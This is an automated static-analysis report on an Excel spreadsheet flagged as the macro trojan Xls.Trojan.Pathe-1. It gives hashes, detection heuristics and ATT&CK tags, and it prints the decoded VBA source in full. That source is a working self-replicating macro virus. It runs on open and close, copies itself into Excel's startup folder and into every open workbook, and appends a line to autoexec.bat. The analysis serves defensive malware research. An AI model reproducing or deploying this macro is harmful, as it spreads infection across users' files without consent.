Xls.Trojan.Pathe-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 ccde3803cb8fe2c1…

MALICIOUS

Office (OLE)

44.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 46d3c36b0a85249d7fb122a905aa8a35 SHA-1: 3ee83adfc181e612ad53cf2556380b702fb8bfe1 SHA-256: ccde3803cb8fe2c1df7aa0337a0c4dc383a5cf9947849c52c7c7c9292dc8d1bf
160 Risk Score

Malware Insights

Xls.Trojan.Pathe-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening. The ClamAV detection name 'Xls.Trojan.Pathe-1' strongly suggests a known trojan. The presence of macros indicates an attempt to deliver a malicious payload, likely via spearphishing.

Heuristics 4

  • ClamAV: Xls.Trojan.Pathe-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Pathe-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3599 bytes
SHA-256: e19e5551e88bb413693ea8dbdd653823a8df39038515c97f5b84390f623283f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Basilisk"
Private Sub auto_open()
On Error Resume Next
With Application
.EnableCancelKey = 0
.ScreenUpdating = False
End With
Dim Beak, Salmon, Camel As Integer
Dim BasiliskExists As Boolean
Const Draco = "C:\Draco"
For Beak = 1 To ActiveWorkbook.VBProject.VBComponents.count
    If ActiveWorkbook.VBProject.VBComponents.Item(Beak).Name = "Basilisk" Then
        Camel = Beak
    End If
Next Beak
ActiveWorkbook.VBProject.VBComponents.Item(Camel).Export Draco
If Dir("c:\program files\microsoft office\office\xlstart\book1.xls") = "" Then
    Workbooks.Add
    ActiveWorkbook.VBProject.VBComponents.Import Draco
    ActiveWorkbook.SaveAs "c:\program files\microsoft office\office\xlstart\book1.xls"
    ActiveWorkbook.Close
End If
For Beak = 1 To Excel.Windows.count
    For Salmon = 1 To Application.Workbooks.Item(Beak).VBProject.VBComponents.count
        If Application.Workbooks.Item(Beak).VBProject.VBComponents.Item(Salmon).Name = "Basilisk" Then
            BasiliskExists = True
            GoTo BasiliskFound
        Else
            BasiliskExists = False
        End If
    Next Salmon
BasiliskFound:
    If BasiliskExists <> True Then
           Application.Workbooks.Item(Beak).VBProject.VBComponents.Import Draco
           Application.Workbooks.Item(Beak).Save
           Open "c:\autoexec.bat" For Append As #1
           Print #1, "@echo T'as été mordu par... Le bec du Saumon " & Application.UserName
           'print #1, "@copy c:\windows\*.ini super.ini /Y"
           Close #1
    End If
Next Beak
Application.ScreenUpdating = True
If Month(Now) = 5 Then
    ActiveWorkbook.Close    'Pathetique je sais
End If
End Sub
Private Sub auto_close()
auto_open
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.